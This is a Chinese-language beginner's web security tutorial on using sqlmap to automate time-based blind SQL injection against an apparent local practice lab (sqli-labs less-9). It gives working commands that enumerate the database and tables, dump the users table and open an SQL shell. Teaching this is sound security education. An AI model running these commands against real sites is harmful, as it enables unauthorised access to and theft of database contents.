本文是Web安全入门系列的第6篇文章
01
前面介绍了SQL注入常见的几种类型,我们都是以手工形式进行注入,今天介绍一款自动化工具:sqlmap。
sqlmap官网地址:http://sqlmap.org/。
官网首页开宗明义:sqlmap是一款自动化SQL注入工具。
并且这款工具是开源的,源码在GitHub上,目前为止一直在维护和更新。
02
打开命令行工具,进入sqlmap解压后所在的文件夹,输入python sqlmap.py(sqlmap运行在Python环境,首先要安装好Python本地环境),看到如下信息说明sqlmap已经可以正常使用。
输入-h查看命令用法:python sqlmap.py -h
03
接下来用sqlmap自动跑一下上篇猜到手抽筋的时间型盲注。
输入:python sqlmap.py -u http://192.168.12.130/sqli/less-9/?id=1
sqlmap会一边运行一边输入日志,注入思路其实和手工注入基本一致。
定位注入点
判断注入类型
判断数据库类型
最终也是用sleep函数来进行基于时间的盲注
拿数据库名称
python sqlmap.py -u http://192.168.12.130/sqli/less-9/?id=1 --batch --current-db
拿数据库表
python sqlmap.py -u http://192.168.12.130/sqli/less-9/?id=1 --batch -D security --tables
拿表数据
python sqlmap.py -u http://192.168.12.130/sqli/less-9/?id=1 --batch -D security -T users
--dump
运行sql查询语句
如果还想查看数据库中其他表的数据,sqlmap还支持运行自定义SQL语句(只支持查询语句)
python sqlmap.py -u http://192.168.12.130/sqli/less-9/?id=1 --sql-shell
有木有很顺滑~是不是很酷炫~
可能有同学会问:既然有这么方便的工具为什么一开始不拿出来?
在使用工具之前,我们得先理解原理,理解了原理,才知道为什么要这么做?为什么结果是这样的?如果哪天我觉得这个工具太菜了,我还能自己写一个。希望大家都能拥有自己的工具~
(部分图片源自网络,侵删)
原文始发于微信公众号(陆吾安全攻防实验室):SQL注入之sqlmap
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论